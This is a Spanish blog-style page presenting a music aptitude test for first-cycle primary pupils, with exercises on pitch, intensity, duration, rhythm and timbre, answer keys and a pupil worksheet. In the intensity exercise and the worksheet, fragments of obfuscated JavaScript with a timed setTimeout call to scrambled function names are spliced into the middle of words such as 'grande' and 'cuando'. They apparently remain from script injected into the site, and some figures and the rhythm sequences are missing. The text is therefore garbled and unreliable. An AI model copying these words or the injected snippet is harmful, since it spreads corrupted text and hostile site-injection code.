TEST DE EVALUACIÓN DE APTITUDES MUSICALES PARA ALUMNOS DE PRIMER CICLO DE EDUCACIÓN PRIMARIA

Autoras: Patricia Hernández Hernández y Sara Abel Santiago González

           Se propone un test para evaluar las aptitudes musicales de niños de primer ciclo de Educación Primaria, que nos puede servir como evaluación final para el primer curso e inicial para el segundo. Concretamente, pretendemos saber si los niños han interiorizado las diferentes cualidades del sonido y, para ello, se utilizarán los instrumentos del aula.


          El desarrollo de los diferentes ejercicios que se van a llevar a cabo en el test será el siguiente:

1.- Distinción de sonidos por su altura

          REALIZACIÓN: Con un piano/xilófono, realizamos escalas ascendentes y descendentes aleatoriamente. Los niños deben dibujar una de las siguientes figuras según se trate de una escala descendente  o ascendente:


Para escalas ascendentes                                                       Para escalas descendentes


          La aplicación de este ejercicio es:

1.- escala ascendente;

2.- escala descendente;

3.- escala descendente;

4.- escala ascendente.


2.- Distinción de sonidos por su intensidad.

          REALIZACIÓN: Con instrumentos de sonidos indeterminados (pandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andero, triángulo, maracas…) realizar secuencias de más o menos intensidad. Los niños deben dibujar círculos pequeños para sonidos de menor intensidad y círculos grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes para sonidos de mayor intensidad.


          Los alumnos deben dibujar un círculo:

1.- grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande;

2.- grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande;

3.- pequeño;

4.- grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande;

5.- pequeño;

6.-pequeño


3.- Distinción de sonidos por su duración.

          REALIZACIÓN: Con instrumentos de viento, como la flauta dulce, producir sonidos largos o cortos. Según si el sonido es largo o corto, dibujar una línea larga o una línea corta.


          En este ejercicio los alumnos dibujarían una línea:

1.- larga;

2.- corta;

3.- corta;

4.- larga;

5.- corta;

6.-larga


 4.- Distinción de diferentes ritmos.

          REALIZACIÓN: Se les palmea a los niños distintas secuencias rítmicas, que tienen que representar ellos en su cuaderno. Las secuencias rítmicas que se aplicarían son:


5.- Distinción de sonidos por su timbre:

          REALIZACIÓN: Se les pone a los niños un CD con los diferentes sonidos de los animales y tienen que numerarlos según escuchen:


          La secuencia de animales fue:

1.- Gallina;

2.- Patos;

3.- Ovejas;

4.- Vaca;

5.- Cerdos;

6.- Burro;

7.- Perro;

8.- Caballo;

9.- Gato

 

La ficha que sería entregada a los alumnos es la siguiente:

TEST DE APTITUDES MUSICALES


1.- Escucha estos sonidos y dibuja esta ola                 si son sonidos que van de grave a agudo (de abajo a arriba); y esta                    si son sonidos que van de agudo a grave (de arriba a abajo).

 

2.- Dibuja un círculo pequeño cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando escuches un sonido piano (suave) y un círculo grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el sonido sea fuerte.

1.-                                                      2.-                                                      3.-

4.-                                                      5.-                                                      6.-

3.- Dibuja una línea corta si escuchas un sonido corto y una larga si el sonido es largo.

1.-                                                      2.-                                                      3.-

4.-                                                      5.-                                                      6.-

4.- Escribe las secuencias melódicas que escuches.

 

5.- Numera estos dibujos según en el orden que los escuches.

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.